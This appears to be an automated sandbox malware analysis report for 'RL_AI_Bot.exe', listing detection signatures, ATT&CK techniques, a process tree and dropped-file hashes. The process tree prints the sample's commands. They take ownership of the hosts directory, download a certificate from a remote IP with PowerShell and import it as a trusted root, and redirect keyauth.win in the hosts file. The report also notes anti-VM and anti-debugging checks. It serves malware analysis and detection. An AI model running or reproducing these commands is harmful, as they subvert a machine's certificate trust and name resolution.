c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0

Analysis

max time kernel
33s
max time network
35s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
05/10/2024, 00:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RL_AI_Bot.exe
Size

4.6MB
MD5

430c4b93e35ef63fbb153c1a12d1621a
SHA1

79bf0b686f7b112e400fe349cfd4b5c62a7389b2
SHA256

c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0
SHA512

96b334d0c4f0b5167e4aed2bccf397e30b850db1616d898ad3461e37874aa153b984ea3e2690d24c0045172a89e643aac2d7509f746e8a2dde161c45fe970ec2
SSDEEP

98304:DXbIrqRVeeHnQC8TVAHaedIs6E7vliojARot:vIAVlHQLA0vC

Score

9^/10

defense_evasion discovery evasion execution exploit themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RL_AI.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	4824	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4824	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
960	takeown.exe
1068	icacls.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RL_AI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RL_AI.exe

Executes dropped EXE 1 IoCs

pid	Process
4836	RL_AI.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
960	takeown.exe
1068	icacls.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000500000002aa25-4.dat	themida
behavioral1/memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida
behavioral1/memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RL_AI.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4836	RL_AI.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
3228	powershell.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2808	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4824	powershell.exe
4824	powershell.exe
3228	powershell.exe
3228	powershell.exe
4836	RL_AI.exe
4836	RL_AI.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe

Suspicious use of SendNotifyMessage 11 IoCs

pid	Process
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe
1004	RL_AI_Bot.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 1004 wrote to memory of 2044	1004	RL_AI_Bot.exe	78
PID 1004 wrote to memory of 2044	1004	RL_AI_Bot.exe	78
PID 2044 wrote to memory of 4616	2044	cmd.exe	80
PID 2044 wrote to memory of 4616	2044	cmd.exe	80
PID 4616 wrote to memory of 960	4616	cmd.exe	81
PID 4616 wrote to memory of 960	4616	cmd.exe	81
PID 4616 wrote to memory of 1068	4616	cmd.exe	82
PID 4616 wrote to memory of 1068	4616	cmd.exe	82
PID 4616 wrote to memory of 3192	4616	cmd.exe	83
PID 4616 wrote to memory of 3192	4616	cmd.exe	83
PID 4616 wrote to memory of 232	4616	cmd.exe	84
PID 4616 wrote to memory of 232	4616	cmd.exe	84
PID 4616 wrote to memory of 4824	4616	cmd.exe	85
PID 4616 wrote to memory of 4824	4616	cmd.exe	85
PID 4616 wrote to memory of 4864	4616	cmd.exe	86
PID 4616 wrote to memory of 4864	4616	cmd.exe	86
PID 4864 wrote to memory of 3632	4864	cmd.exe	87
PID 4864 wrote to memory of 3632	4864	cmd.exe	87
PID 4616 wrote to memory of 3228	4616	cmd.exe	88
PID 4616 wrote to memory of 3228	4616	cmd.exe	88
PID 4616 wrote to memory of 2068	4616	cmd.exe	89
PID 4616 wrote to memory of 2068	4616	cmd.exe	89
PID 2068 wrote to memory of 3660	2068	cmd.exe	90
PID 2068 wrote to memory of 3660	2068	cmd.exe	90
PID 2068 wrote to memory of 4500	2068	cmd.exe	91
PID 2068 wrote to memory of 4500	2068	cmd.exe	91
PID 4616 wrote to memory of 1032	4616	cmd.exe	92
PID 4616 wrote to memory of 1032	4616	cmd.exe	92
PID 4616 wrote to memory of 2808	4616	cmd.exe	93
PID 4616 wrote to memory of 2808	4616	cmd.exe	93
PID 1004 wrote to memory of 4836	1004	RL_AI_Bot.exe	94
PID 1004 wrote to memory of 4836	1004	RL_AI_Bot.exe	94
PID 4836 wrote to memory of 2552	4836	RL_AI.exe	96
PID 4836 wrote to memory of 2552	4836	RL_AI.exe	96
PID 4836 wrote to memory of 3020	4836	RL_AI.exe	97
PID 4836 wrote to memory of 3020	4836	RL_AI.exe	97
PID 3020 wrote to memory of 3960	3020	cmd.exe	98
PID 3020 wrote to memory of 3960	3020	cmd.exe	98
PID 3020 wrote to memory of 3472	3020	cmd.exe	99
PID 3020 wrote to memory of 3472	3020	cmd.exe	99
PID 3020 wrote to memory of 1656	3020	cmd.exe	100
PID 3020 wrote to memory of 1656	3020	cmd.exe	100
PID 4836 wrote to memory of 4872	4836	RL_AI.exe	101
PID 4836 wrote to memory of 4872	4836	RL_AI.exe	101

C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe
"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off & echo Running fix.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
    3⤵
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\takeown.exe
      takeown /F C:\Windows\System32\drivers\etc /R /A
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:960
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\drivers\etc /grant administrators:F /T
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1068
  - - C:\Windows\system32\certutil.exe
      certutil -store TrustedRoot
      4⤵
      PID:3192
  - - C:\Windows\system32\findstr.exe
      findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4864
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
        5⤵
        
        PID:3632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
      4⤵
      Hide Artifacts: Ignore Process Interrupts
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Windows\system32\certutil.exe
        
        certutil -store TrustedRoot
        5⤵
        
        PID:3660
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
        5⤵
        
        PID:4500
  - - C:\Windows\system32\findstr.exe
      findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:1032
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2808
- C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
  C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5
      4⤵
      PID:3960
  - - C:\Windows\system32\find.exe
      find /i /v "md5"
      4⤵
      PID:3472
  - - C:\Windows\system32\find.exe
      find /i /v "certutil"
      4⤵
      PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e6baeec02c3d93dce26652e7acebc90

SHA1
937a7b4a0d42ea56e21a1a00447d899a2aca3c28

SHA256
137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

SHA512
461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0i3atge.wxq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\autA151.tmp

Filesize
3.6MB

MD5
898bbb4fac0d31cacf8bd6f0ea1dcd14

SHA1
cbc25afd3e39ec0b030a6148ad44ae882ad063be

SHA256
87f84086ae3ebd38fe6df4c2a90cc2064787c9a863bb279cc278467aa2f0edc9

SHA512
66848d109d566c7f6c273c86b0a8611340e46534a4f028f91091d06900448c95c4093bd987c06a2be4c246ded5c6baa8de3d03049f4cfa49da9b360e6b5a2ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\fix.bat

Filesize
1KB

MD5
ded50caaa850f5278662834fd32021ae

SHA1
2bd1354b58408585a5ef862838cb97f7ab1f219c

SHA256
9847b9305180be84090dc361c21bfc002223309fbf22a991b5396bf5a5fd79d3

SHA512
d8286d37a412aa73cd97f0a5321825f5bf138e91069477e4dddfbfcc0835723606a692da858b4331d2f127b50d2154d81fd98bd08d0a1d0904b63e07de689620

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.crt

Filesize
9KB

MD5
5663fb32607a5562453a8125a8f812c4

SHA1
764264efe0329df2a961dca0e45efc70878bfed7

SHA256
f6b3ca3c38d3efebe9a1e98f6042807f087688586c93513bae631fe24e1fe81e

SHA512
31b05f2d170b77ca4cfe298e913e0c07a7b5e57fbe4f1296b8b616729564f32fc3f53c6993f51dd50015aba808ae4c59560155119556e76744990cef68ef4b86

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
memory/4824-18-0x000001C65FBF0000-0x000001C65FC12000-memory.dmp

Filesize
136KB

Download
memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download
memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

Filesize
8.7MB

Download